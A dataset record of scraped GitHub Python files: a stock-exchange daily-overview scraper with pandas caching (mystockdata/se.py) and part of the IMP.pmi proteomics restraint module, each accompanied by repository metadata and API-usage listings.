# imageio.imwrite(save_path+'edge/'+name, (e*255).astype(np.uint8))
|
thograce/BGNet
|
etest.py
|
etest.py
|
py
| 1,718 |
python
|
en
|
code
| 57 |
github-code
|
6
|
[
{
"api_name": "os.environ",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "net.bgnet.Net",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "torch.load",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.makedirs",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.makedirs",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "utils.tdataloader.test_dataset",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.functional.upsample",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 36,
"usage_type": "name"
},
{
"api_name": "imageio.imwrite",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 39,
"usage_type": "attribute"
}
] |
21141233312
|
import datetime
import json
import os
import time
import pandas as pd
import requests
from mystockdata import config, db
from mystockdata.db import DatetimeIndexMixin, PrefixedDfDb
from mystockdata.exceptions import HistoryDataError
class ShSeDb(DatetimeIndexMixin, PrefixedDfDb):
prefix = 'sh_se_'
class CybSeDb(DatetimeIndexMixin, PrefixedDfDb):
prefix = 'cyb_se_'
class SzSeDb(DatetimeIndexMixin, PrefixedDfDb):
prefix = 'sz_se_'
class SzzbSeDb(DatetimeIndexMixin, PrefixedDfDb,):
prefix = 'szzb_se_'
class ZxqySeDb(DatetimeIndexMixin, PrefixedDfDb, ):
prefix = 'zxqy_se_'
class SSE:
sedb = ShSeDb()
def read_cache(self):
df = self.sedb.read()
return df
def write_cache(self, df):
df = self.sedb.save(df)
def get_sse_overview_day(self):
'''
source: http://www.sse.com.cn/market/stockdata/overview/day/
'''
def _fetch(date):
url = ('http://query.sse.com.cn/marketdata/tradedata',
'/queryTradingByProdTypeData.do?jsonCallBack=jsonpCallback74321',
'&searchDate=[DAY]&prodType=gp&_=1456558103149')
headers = {
'Host': 'www.sse.com.cn',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36',
'Referer': 'http://www.sse.com.cn/market/stockdata/overview/day/',
}
real_url = ''.join(url).replace('[DAY]', date.strftime("%Y-%m-%d"))
rst = requests.get(url=real_url, headers=headers).text
json_str = rst[19:len(rst) - 1]
rst_list = json.loads(json_str)
rst_list = rst_list['result']
headers = ['istVol', 'SH_profitRate1', 'SH_negotiableValue1', 'SH_trdAmt1', 'SH_trdVol1', 'SH_trdTm1',
'A_istVol', 'A_profitRate1', 'A_negotiableValue1', 'A_trdAmt1', 'A_trdVol1', 'A_trdTm1',
'B_istVol', 'B_profitRate1', 'B_negotiableValue1', 'B_trdAmt1', 'B_trdVol1', 'B_trdTm1']
tmp_dict = dict()
for key, value in rst_list[0].items():
tmp_dict['A_' + key] = value if value else None
for key, value in rst_list[1].items():
tmp_dict['B_' + key] = value if value else None
for key, value in rst_list[2].items():
tmp_dict['SH_' + key] = value if value else None
return pd.DataFrame([tmp_dict, ], index=[date, ])
def _fetch_dates(begin, end, to_df=True):
tmp = []
print(begin, end)
dates = pd.date_range(begin, end)
if len(dates) == 1:
return None
for date in dates:
tmp.append(_fetch(date))
# print(tmp[-1])
if len(dates) > 1:
print('sleep')
time.sleep(0.5)
# print(pd.concat(tmp))
return pd.concat(tmp)
cache_df = self.read_cache()
if cache_df is None or cache_df.empty:
raise HistoryDataError()
else:
start = max(cache_df.index) + datetime.timedelta(days=-1)
new_df = _fetch_dates(
start, datetime.datetime.now())
if new_df is not None:
cache_df = cache_df.drop(new_df.index, errors='ignore')
df = pd.concat([cache_df, new_df])
if len(df) > len(cache_df):
self.write_cache(df)
return df
class SZSE:
dbs = {'sz': SzSeDb(), 'cyb': CybSeDb(),
'zxqy': ZxqySeDb(), 'szzb': SzzbSeDb()}
def read_cache(self, category):
df = self.dbs[category].read()
return df
def write_cache(self, df, category):
df = self.dbs[category].save(df)
def get_szse_overview_day(self, category):
'''
source: http://www.szse.cn/main/marketdata/tjsj/jbzb/
'''
def _fetch(date, category):
urls = {
'sz':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab1'),
                # Shenzhen Main Board
'szzb':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab2'),
                # SME Board (small and medium-sized enterprises)
'zxqy':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab3'),
                # ChiNext (growth enterprise board)
'cyb':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab4')}
df = pd.read_html(''.join(urls[category]) % date.strftime(
"%Y-%m-%d"), encoding='gbk', header=0)[0]
if df.columns[0] == '没有找到符合条件的数据!':
return None
if category in ('szzb', 'cyb', 'zxqy'):
del df['比上日增减']
del df['本年最高']
del df['最高值日期']
if category == 'sz':
del df['比上日增减']
del df['幅度%']
del df['本年最高']
del df['最高值日期']
df = pd.pivot_table(df, columns='指标名称')
df.index = pd.DatetimeIndex([date.strftime("%Y-%m-%d")])
return df
def _fetch_dates(begin, end, category):
tmp = []
print(begin, end)
dates = pd.date_range(begin, end)
if len(dates) == 1:
return None
for date in dates:
tmp.append(_fetch(date, category))
if len(dates) > 1:
print('sleep')
time.sleep(0.5)
return pd.concat(tmp)
cache_df = self.read_cache(category)
if cache_df is None or cache_df.empty:
raise HistoryDataError()
else:
start = max(cache_df.index) + datetime.timedelta(days=-1)
new_df = _fetch_dates(start, datetime.datetime.now(), category)
if new_df is not None:
cache_df = cache_df.drop(new_df.index, errors='ignore')
df = pd.concat([cache_df, new_df])
if len(df) > len(cache_df):
self.write_cache(df, category)
return df
class SE:
@classmethod
def get_overview_day_field(cls, f_sha, f_shb, f_sh, f_sz, f_cyb, f_zxqy, f_szzb):
sh, sz, cyb, zxqy, szzb = ShSeDb(), SzSeDb(), CybSeDb(), ZxqySeDb(), SzzbSeDb()
sh = sh.read(columns=[f_sha, f_shb, f_sh])
sh.columns = ['SHA', 'SHB', 'SH']
sz = sz.read(columns=[f_sz])
sz.columns = ['SZ']
cyb = cyb.read([f_cyb])
cyb.columns = ['CYB']
zxqy = zxqy.read([f_zxqy])
zxqy.columns = ['ZXQY']
szzb = szzb.read([f_szzb])
szzb.columns = ['SZZB']
df = pd.concat([sh, sz, cyb, zxqy, szzb, ], axis=1)
df = df.fillna(method='bfill')
return df
@classmethod
def get_pe(cls):
return cls.get_overview_day_field('A_profitRate1', 'B_profitRate1', 'SH_profitRate1',
'股票平均市盈率', '平均市盈率(倍)', '平均市盈率(倍)', '平均市盈率(倍)',)
@classmethod
def get_market_val(cls):
df = cls.get_overview_day_field('A_marketValue1', 'B_marketValue1', 'SH_marketValue1',
'股票总市值(元)', '上市公司市价总值(元)', '上市公司市价总值(元)', '上市公司市价总值(元)',)
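        # presumably rescales the Shenzhen-sourced columns from yuan to
        # hundreds of millions of yuan so they are comparable with the
        # Shanghai figures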
df[['SZ', 'CYB', 'ZXQY']] = df[['SZ', 'CYB', 'ZXQY']] / 100000000
return df
@classmethod
def get_negotiable_val(cls):
df = cls.get_overview_day_field('A_negotiableValue', 'B_negotiableValue', 'SH_negotiableValue',
'股票流通市值(元)', '上市公司流通市值(元)', '上市公司流通市值(元)', '上市公司流通市值(元)',)
df[['SZ', 'CYB', 'ZXQY']] = df[['SZ', 'CYB', 'ZXQY']] / 100000000
return df
@classmethod
def get_avg_price(cls):
        sh, sz, cyb, zxqy, szzb = cls.get_overview_day()
sh_a = sh['A_trdAmt'].apply(
float) * 10000 / sh['A_trdVol'].apply(float)
sh_a.name = 'SHA'
sh_b = sh['B_trdAmt'].apply(
float) * 10000 / sh['B_trdVol'].apply(float)
sh_b.name = 'SHB'
sh_sh = sh['SH_trdAmt'].apply(
float) * 10000 / sh['SH_trdVol'].apply(float)
sh_sh.name = 'SH'
sz = sz['平均股票价格(元)']
sz.name = 'SZ'
cyb = cyb['总成交金额(元)'] / cyb['总成交股数']
cyb.name = 'CYB'
zxqy = zxqy['总成交金额(元)'] / zxqy['总成交股数']
zxqy.name = 'ZXQY'
szzb = szzb['总成交金额(元)'] / szzb['总成交股数']
szzb.name = 'SZZB'
df = pd.concat([sh_a, sh_b, sh_sh, sz, cyb, zxqy, szzb, ], axis=1)
return df
def load_old_file():
def read_file(file):
path = os.path.abspath(os.path.dirname(__file__))
df = pd.read_csv(os.path.join(path, file))
df.index = pd.DatetimeIndex(df.date)
del df['date']
return df
ShSeDb().save(read_file('files/se/sh_sse_day_overview.csv'))
SzSeDb().save(read_file('files/se/sz_day_overview.csv'))
CybSeDb().save(read_file('files/se/cyb_day_overview.csv'))
SzzbSeDb().save(read_file('files/se/szzb_day_overview.csv'))
ZxqySeDb().save(read_file('files/se/zxqy_day_overview.csv'))
for key in db.DfDb().keys():
print(key)
|
onecans/my
|
mystockdata/mystockdata/se.py
|
se.py
|
py
| 9,831 |
python
|
en
|
code
| 2 |
github-code
|
6
|
[
{
"api_name": "mystockdata.db.DatetimeIndexMixin",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.PrefixedDfDb",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.DatetimeIndexMixin",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.PrefixedDfDb",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.DatetimeIndexMixin",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.PrefixedDfDb",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.DatetimeIndexMixin",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.PrefixedDfDb",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.DatetimeIndexMixin",
"line_number": 30,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.PrefixedDfDb",
"line_number": 30,
"usage_type": "name"
},
{
"api_name": "requests.get",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "pandas.date_range",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "pandas.concat",
"line_number": 95,
"usage_type": "call"
},
{
"api_name": "mystockdata.exceptions.HistoryDataError",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 103,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 103,
"usage_type": "attribute"
},
{
"api_name": "pandas.concat",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "pandas.read_html",
"line_number": 150,
"usage_type": "call"
},
{
"api_name": "pandas.pivot_table",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "pandas.DatetimeIndex",
"line_number": 166,
"usage_type": "call"
},
{
"api_name": "pandas.date_range",
"line_number": 172,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 179,
"usage_type": "call"
},
{
"api_name": "pandas.concat",
"line_number": 181,
"usage_type": "call"
},
{
"api_name": "mystockdata.exceptions.HistoryDataError",
"line_number": 185,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 187,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 188,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 188,
"usage_type": "attribute"
},
{
"api_name": "pandas.concat",
"line_number": 191,
"usage_type": "call"
},
{
"api_name": "pandas.concat",
"line_number": 217,
"usage_type": "call"
},
{
"api_name": "pandas.concat",
"line_number": 267,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"line_number": 273,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 273,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 273,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 274,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 274,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 274,
"usage_type": "attribute"
},
{
"api_name": "pandas.DatetimeIndex",
"line_number": 275,
"usage_type": "call"
},
{
"api_name": "mystockdata.db.DfDb",
"line_number": 284,
"usage_type": "call"
},
{
"api_name": "mystockdata.db",
"line_number": 284,
"usage_type": "name"
}
] |
2088974749
|
"""@namespace IMP.pmi.restraints.proteomics
Restraints for handling various kinds of proteomics data.
"""
from __future__ import print_function
import IMP
import IMP.core
import IMP.algebra
import IMP.atom
import IMP.container
import IMP.pmi
import IMP.pmi.tools
import IMP.pmi.output
import numpy
import math
import sys
import warnings
class ConnectivityRestraint(object):
'''
generate a connectivity restraint between domains
setting up the restraint
example:
sel1 = IMP.atom.Selection(root_hier, molecule="Rpb3",
residue_indexes=range(1,100))
sel2 = IMP.atom.Selection(root_hier, molecule="Rpb4",
residue_indexes=range(1,100))
cr=restraints.ConnectivityRestraint((sel1, sel2), label='CR1')
cr.add_to_model()
Multistate support =No
Resolution=Yes
'''
def __init__(self, domains, kappa=10.0, resolution=None, label="None"):
self.weight = 1.0
self.kappa = kappa
self.label = label
cr = IMP.atom.create_connectivity_restraint(
domains, self.kappa, self.label)
self.m = cr.get_model()
self.rs = IMP.RestraintSet(self.m, label)
self.rs.add_restraint(cr)
def set_label(self, label):
self.label = label
self.rs.set_name(label)
for r in self.rs.get_restraints():
r.set_name(label)
def add_to_model(self):
IMP.pmi.tools.add_restraint_to_model(self.m, self.rs)
def get_restraint(self):
return self.rs
def get_restraints(self):
rlist = []
for r in self.rs.get_restraints():
rlist.append(IMP.core.PairRestraint.get_from(r))
return rlist
def set_weight(self, weight):
self.weight = weight
self.rs.set_weight(weight)
def get_output(self):
output = {}
score = self.weight * self.rs.unprotected_evaluate(None)
output["_TotalScore"] = str(score)
output["ConnectivityRestraint_" + self.label] = str(score)
return output
#
class CompositeRestraint(object):
'''
    handle_particles is a list of particles
    composite_particles is a list of lists of particles
'''
def __init__(self, handle_particles, composite_particles, cut_off=5.0,
lam=1.0, plateau=0.0, resolution=None, label="None"):
# composite particles: all particles beside the handle
self.label = label
hs = IMP.pmi.tools.input_adaptor(handle_particles, resolution,
flatten=True)
self.handleparticles = [h.get_particle() for h in hs]
self.m = self.handleparticles[0].get_model()
self.rs = IMP.RestraintSet(self.m, 'cr')
self.compositeparticles = []
compositeparticle_list = []
for cp in composite_particles:
hs = IMP.pmi.tools.input_adaptor(cp, resolution, flatten=True)
tmplist = [h.get_particle() for h in hs]
compositeparticle_list.append(tmplist)
self.compositeparticles += tmplist
ln = IMP.pmi.CompositeRestraint(
self.m, self.handleparticles, cut_off, lam, True, plateau)
for ps in compositeparticle_list:
# composite particles is a list of list of particles
ln.add_composite_particle(ps)
self.rs.add_restraint(ln)
def set_label(self, label):
self.label = label
def get_handle_particles(self):
return self.handleparticles
def get_composite_particles(self):
return self.compositeparticles
def get_restraint(self):
return self.rs
def add_to_model(self):
IMP.pmi.tools.add_restraint_to_model(self.m, self.rs)
def get_output(self):
output = {}
score = self.rs.unprotected_evaluate(None)
output["_TotalScore"] = str(score)
output["CompositeRestraint_" + self.label] = str(score)
return output
#
class AmbiguousCompositeRestraint(object):
'''
    this restraint allows ambiguous cross-linking between multiple copies,
    excluding cross-links between symmetric copies.
    It also allows name ambiguity.
'''
def __init__(self, root_hier, restraints_file, cut_off=5.0, lam=1.0,
plateau=0.01, resolution=None, label="None"):
self.weight = 1.0
self.m = root_hier.get_model()
self.rs = IMP.RestraintSet(self.m, 'data')
self.label = "None"
self.pairs = []
self.outputlevel = "low"
self.cut_off = cut_off
self.lam = lam
self.plateau = plateau
fl = IMP.pmi.tools.open_file_or_inline_text(restraints_file)
for line in fl:
tokens = line.split()
# skip character
if (tokens[0] == "#"):
continue
r1 = int(tokens[2])
c1 = tokens[0]
r2 = int(tokens[3])
c2 = tokens[1]
ps1 = IMP.atom.Selection(root_hier, resolution=resolution,
molecule=c1, residue_index=r1)
ps1 = ps1.get_selected_particles()
hrc1 = [p.get_name() for p in ps1]
def nosym_subset(ps):
return [p for p in ps if not IMP.pmi.Symmetric.get_is_setup(p)
or IMP.pmi.Symmetric(p).get_symmetric() == 0]
ps1nosym = nosym_subset(ps1)
hrc1nosym = [p.get_name() for p in ps1nosym]
if len(ps1) == 0:
warnings.warn(
"AmbiguousCompositeRestraint: residue %d of chain %s "
"is not there" % (r1, c1), IMP.pmi.StructureWarning)
continue
ps2 = IMP.atom.Selection(root_hier, resolution=resolution,
molecule=c2, residue_index=r2)
ps2 = ps2.get_selected_particles()
hrc2 = [p.get_name() for p in ps2]
ps2nosym = nosym_subset(ps2)
hrc2nosym = [p.get_name() for p in ps2nosym]
if len(ps2) == 0:
warnings.warn(
"AmbiguousCompositeRestraint: residue %d of chain %s "
"is not there" % (r2, c2), IMP.pmi.StructureWarning)
continue
cr = IMP.pmi.CompositeRestraint(
self.m, ps1nosym, self.cut_off, self.lam, True, self.plateau)
cr.add_composite_particle(ps2)
self.rs.add_restraint(cr)
self.pairs.append(
(ps1nosym,
hrc1nosym,
c1,
r1,
ps2,
hrc2,
c2,
r2,
cr))
cr = IMP.pmi.CompositeRestraint(
self.m, ps1, self.cut_off, self.lam, True, self.plateau)
cr.add_composite_particle(ps2nosym)
self.rs.add_restraint(cr)
self.pairs.append(
(ps1,
hrc1,
c1,
r1,
ps2nosym,
hrc2nosym,
c2,
r2,
cr))
def plot_restraint(
self,
maxdist=100,
npoints=100):
p1 = IMP.Particle(self.m)
p2 = IMP.Particle(self.m)
d1 = IMP.core.XYZR.setup_particle(p1)
d2 = IMP.core.XYZR.setup_particle(p2)
cr = IMP.pmi.CompositeRestraint(
self.m,
[p1],
self.cut_off,
self.lam,
True,
self.plateau)
cr.add_composite_particle([p2])
dists = []
scores = []
for i in range(npoints):
d2.set_coordinates(
IMP.algebra.Vector3D(maxdist / npoints * float(i), 0, 0))
dists.append(IMP.core.get_distance(d1, d2))
scores.append(cr.unprotected_evaluate(None))
IMP.pmi.output.plot_xy_data(dists, scores)
def set_label(self, label):
self.label = label
self.rs.set_name(label)
for r in self.rs.get_restraints():
r.set_name(label)
def add_to_model(self):
IMP.pmi.tools.add_restraint_to_model(self.m, self.rs)
def get_hierarchies(self):
return self.prot
def get_restraint_sets(self):
return self.rs
def get_restraint(self):
return self.rs
def set_output_level(self, level="low"):
# this might be "low" or "high"
self.outputlevel = level
def set_weight(self, weight):
self.weight = weight
self.rs.set_weight(weight)
def get_output(self):
# content of the cross-link database pairs
# self.pairs.append((p1,p2,dr,r1,c1,r2,c2))
output = {}
score = self.weight * self.rs.unprotected_evaluate(None)
output["_TotalScore"] = str(score)
output["AmbiguousCompositeRestraint_Score_" + self.label] = str(score)
for n, p in enumerate(self.pairs):
ps1 = p[0]
hrc1 = p[1]
c1 = p[2]
r1 = p[3]
ps2 = p[4]
hrc2 = p[5]
c2 = p[6]
r2 = p[7]
cr = p[8]
for n1, p1 in enumerate(ps1):
name1 = hrc1[n1]
for n2, p2 in enumerate(ps2):
name2 = hrc2[n2]
d1 = IMP.core.XYZR(p1)
d2 = IMP.core.XYZR(p2)
label = str(r1) + ":" + name1 + "_" + str(r2) + ":" + name2
output["AmbiguousCompositeRestraint_Distance_" +
label] = str(IMP.core.get_distance(d1, d2))
label = str(r1) + ":" + c1 + "_" + str(r2) + ":" + c2
output["AmbiguousCompositeRestraint_Score_" +
label] = str(self.weight * cr.unprotected_evaluate(None))
return output
#
class SimplifiedPEMAP(object):
def __init__(self, root_hier, restraints_file, expdistance, strength,
resolution=None):
self.m = root_hier.get_model()
self.rs = IMP.RestraintSet(self.m, 'data')
self.label = "None"
self.pairs = []
self.outputlevel = "low"
self.expdistance = expdistance
self.strength = strength
fl = IMP.pmi.tools.open_file_or_inline_text(restraints_file)
for line in fl:
tokens = line.split()
# skip character
if (tokens[0] == "#"):
continue
r1 = int(tokens[2])
c1 = tokens[0]
r2 = int(tokens[3])
c2 = tokens[1]
pcc = float(tokens[4])
ps1 = IMP.atom.Selection(root_hier, resolution=resolution,
molecule=c1, residue_index=r1,
copy_index=0)
ps1 = ps1.get_selected_particles()
if len(ps1) == 0:
warnings.warn(
"SimplifiedPEMAP: residue %d of chain %s is not there "
"(w/ %d %s)" % (r1, c1, r2, c2), IMP.pmi.StructureWarning)
continue
if len(ps1) > 1:
warnings.warn(
"SimplifiedPEMAP: residue %d of chain %s selected "
"multiple particles" % (r1, c1), IMP.pmi.StructureWarning)
continue
ps2 = IMP.atom.Selection(root_hier, resolution=resolution,
molecule=c2, residue_index=r2,
copy_index=0)
ps2 = ps2.get_selected_particles()
if len(ps2) == 0:
warnings.warn(
"SimplifiedPEMAP: residue %d of chain %s is not there "
"(w/ %d %s)" % (r1, c1, r2, c2), IMP.pmi.StructureWarning)
continue
if len(ps2) > 1:
warnings.warn(
"SimplifiedPEMAP: residue %d of chain %s selected "
"multiple particles" % (r2, c2), IMP.pmi.StructureWarning)
continue
p1 = ps1[0]
p2 = ps2[0]
# This is harmonic potential for the pE-MAP data
upperdist = self.get_upper_bond(pcc)
limit = 0.5 * self.strength * 15.0 ** 2 + 10.0
hub = IMP.core.TruncatedHarmonicUpperBound(
upperdist, self.strength, 15, limit)
# This is harmonic for the X-link
df = IMP.core.SphereDistancePairScore(hub)
dr = IMP.core.PairRestraint(self.m, df, (p1, p2))
self.rs.add_restraint(dr)
self.pairs.append((p1, p2, dr, r1, c1, r2, c2))
# Lower-bound restraint
lowerdist = self.get_lower_bond(pcc)
limit = 0.5 * self.strength * 15.0 ** 2 + 10.0
hub2 = IMP.core.TruncatedHarmonicLowerBound(
lowerdist, self.strength, 15, limit)
# This is harmonic for the X-link
df2 = IMP.core.SphereDistancePairScore(hub2)
dr2 = IMP.core.PairRestraint(self.m, df2, (p1, p2))
self.rs.add_restraint(dr2)
self.pairs.append((p1, p2, dr2, r1, c1, r2, c2))
def get_upper_bond(self, pearsoncc):
# return (pearsoncc-1.)/-0.0075
return (pearsoncc - .5) / (-0.005415)
def get_lower_bond(self, pearsoncc):
return (pearsoncc - 1.) / -0.0551
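        # Illustrative check of the two linear maps above (rounded values):
        # for a Pearson correlation of 0.4,
        #   upper bound = (0.4 - 0.5) / (-0.005415) ~ 18.5
        #   lower bound = (0.4 - 1.0) / (-0.0551)   ~ 10.9
        # so higher correlations push the two residues to be closer together.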
def set_label(self, label):
self.label = label
def add_to_model(self):
IMP.pmi.tools.add_restraint_to_model(self.m, self.rs)
def get_hierarchies(self):
return self.prot
def get_restraint_sets(self):
return self.rs
def set_output_level(self, level="low"):
# this might be "low" or "high"
self.outputlevel = level
def get_output(self):
# content of the cross-link database pairs
# self.pairs.append((p1,p2,dr,r1,c1,r2,c2))
output = {}
score = self.rs.unprotected_evaluate(None)
output["_TotalScore"] = str(score)
output["SimplifiedPEMAP_Score_" + self.label] = str(score)
for i in range(len(self.pairs)):
p0 = self.pairs[i][0]
p1 = self.pairs[i][1]
crosslinker = 'standard'
ln = self.pairs[i][2]
resid1 = self.pairs[i][3]
chain1 = self.pairs[i][4]
resid2 = self.pairs[i][5]
chain2 = self.pairs[i][6]
label = str(resid1) + ":" + chain1 + "_" + \
str(resid2) + ":" + chain2
output["SimplifiedPEMAP_Score_" + crosslinker + "_" +
label] = str(ln.unprotected_evaluate(None))
d0 = IMP.core.XYZ(p0)
d1 = IMP.core.XYZ(p1)
output["SimplifiedPEMAP_Distance_" +
label] = str(IMP.core.get_distance(d0, d1))
return output
class SetupConnectivityNetworkRestraint(object):
'''
    generates and wraps a ConnectivityNetworkRestraint between domains
example:
cr=restraints.ConnectivityNetworkRestraint(
simo,["CCC",(1,100,"TTT"),(100,150,"AAA")])
cr.add_to_model()
cr.set_label("CR1")
Multistate support =No
Selection type=selection tuple
Resolution=Yes
'''
def __init__(self, objects, kappa=10.0, resolution=1.0, label="None"):
self.weight = 1.0
self.kappa = kappa
self.label = label
if self.label == "None":
            self.label = str(objects)
hiers = []
for obj in objects:
hiers.append(IMP.pmi.tools.input_adaptor(
obj, resolution, flatten=True))
self.m = hiers[0][0].get_model()
cr = ConnectivityNetworkRestraint(self.m)
for hs in hiers:
cr.add_particles([h.get_particle() for h in hs])
self.rs = IMP.RestraintSet(self.m, label)
self.rs.add_restraint(cr)
def set_label(self, label):
self.label = label
self.rs.set_name(label)
for r in self.rs.get_restraints():
r.set_name(label)
def add_to_model(self):
IMP.pmi.tools.add_restraint_to_model(self.m, self.rs)
def get_restraint(self):
return self.rs
def get_restraints(self):
rlist = []
for r in self.rs.get_restraints():
rlist.append(IMP.core.PairRestraint.get_from(r))
return rlist
def set_weight(self, weight):
self.weight = weight
self.rs.set_weight(weight)
def get_output(self):
output = {}
score = self.weight * self.rs.unprotected_evaluate(None)
output["_TotalScore"] = str(score)
output["ConnectivityNetworkRestraint_" + self.label] = str(score)
return output
class ConnectivityNetworkRestraint(IMP.Restraint):
'''
a python restraint that computes the score for a composite of proteins
Authors: G. Bouvier, R. Pellarin. Pasteur Institute.
'''
def __init__(self, m, slope=1.0, theta=0.0, plateau=0.0000000001,
linear_slope=0.015):
'''
input a list of particles, the slope and theta of the sigmoid potential
theta is the cutoff distance for a protein-protein contact
'''
# Import networkx here so that we don't introduce it as a dependency
# for *every* proteomics restraint, only this one
import networkx
self.networkx = networkx
IMP.Restraint.__init__(self, m, "ConnectivityNetworkRestraint %1%")
self.slope = slope
self.theta = theta
self.linear_slope = linear_slope
self.plateau = plateau
self.particles_blocks = []
self.particle_list = []
def get_number_of_particle_blocks(self):
return len(self.particles_blocks)
def get_number_of_particles_for_block(self, block_index):
return len(self.particles_blocks[block_index])
def add_particles(self, particles):
self.particles_blocks.append(particles)
self.particle_list += particles
def get_full_graph(self):
'''
get the full graph of distances between every particle pair
'''
import scipy.spatial
pdist_array = numpy.array(
IMP.pmi.get_list_of_bipartite_minimum_sphere_distance(
self.particles_blocks))
pdist_mat = scipy.spatial.distance.squareform(pdist_array)
pdist_mat[pdist_mat < 0] = 0
graph = self.networkx.Graph(pdist_mat)
return graph
def get_minimum_spanning_tree(self):
"""
return the minimum spanning tree
"""
graph = self.get_full_graph()
graph = self.networkx.minimum_spanning_tree(graph)
return graph
def sigmoid(self, x):
'''
a sigmoid function that scores the probability of a contact
between two proteins
'''
# return 1 - (x)**self.slope/ float(((x)**self.slope +
# self.theta**self.slope))
argvalue = (x - self.theta) / self.slope
return 1.0 - (1.0 - self.plateau) / (1.0 + math.exp(-argvalue))
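        # Rough behaviour (illustrative, with plateau ~ 1e-10): the score is
        # about 0.5 at x == theta, approaches 1 for x well below theta and
        # decays towards the plateau for x well above theta, so short
        # distances are scored as likely contacts.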
def unprotected_evaluate(self, da):
graph = self.get_minimum_spanning_tree()
score = 0.0
for e in graph.edges():
dist = graph.get_edge_data(*e)['weight']
prob = self.sigmoid(dist)
score += -numpy.log(prob)
score += self.linear_slope * dist
return score
def do_get_inputs(self):
return self.particle_list
class FuzzyBoolean(object):
'''
Fully Ambiguous Restraint that can be built using boolean logic
R. Pellarin. Pasteur Institute.
'''
def __init__(self, p1, operator=None, p2=None):
'''
        input either two FuzzyBoolean operands together with a binary
        operator, or a single numeric truth value
'''
if isinstance(p1, FuzzyBoolean) and isinstance(p2, FuzzyBoolean):
self.operations = [p1, operator, p2]
self.value = None
else:
self.operations = []
self.value = p1
def __or__(self, FuzzyBoolean2):
return FuzzyBoolean(self, self.or_, FuzzyBoolean2)
def __and__(self, FuzzyBoolean2):
return FuzzyBoolean(self, self.and_, FuzzyBoolean2)
def and_(self, a, b):
return a * b
def or_(self, a, b):
return 1.0 - (1.0 - a) * (1.0 - b)
def evaluate(self):
if len(self.operations) == 0:
return self.value
FuzzyBoolean1, op, FuzzyBoolean2 = self.operations
return op(FuzzyBoolean1.evaluate(), FuzzyBoolean2.evaluate())
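# A small usage sketch (illustrative only) of the fuzzy boolean algebra above:
#
#     a, b = FuzzyBoolean(0.8), FuzzyBoolean(0.5)
#     (a & b).evaluate()   # -> 0.8 * 0.5 = 0.4
#     (a | b).evaluate()   # -> 1 - (1 - 0.8) * (1 - 0.5) = 0.9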
class FuzzyRestraint(IMP.Restraint):
'''
Fully Ambiguous Restraint that can be built using boolean logic
R. Pellarin. Pasteur Institute.
'''
plateau = 0.00000000000001
theta = 5.0
slope = 2.0
innerslope = 0.01
def __init__(self, m, p1, p2, operator=None):
'''
        input the model and either a pair of particles or a pair of
        FuzzyRestraint operands, together with an optional binary operator
'''
IMP.Restraint.__init__(self, m, "FuzzyRestraint %1%")
self.m = m
self.min = sys.float_info.min
if isinstance(p1, FuzzyRestraint) and isinstance(p2, FuzzyRestraint):
self.operations = [p1, operator, p2]
self.particle_pair = None
elif isinstance(p1, FuzzyRestraint) and p2 is None:
self.operations = [p1, operator, None]
self.particle_pair = None
else:
self.operations = []
self.particle_pair = (p1, p2)
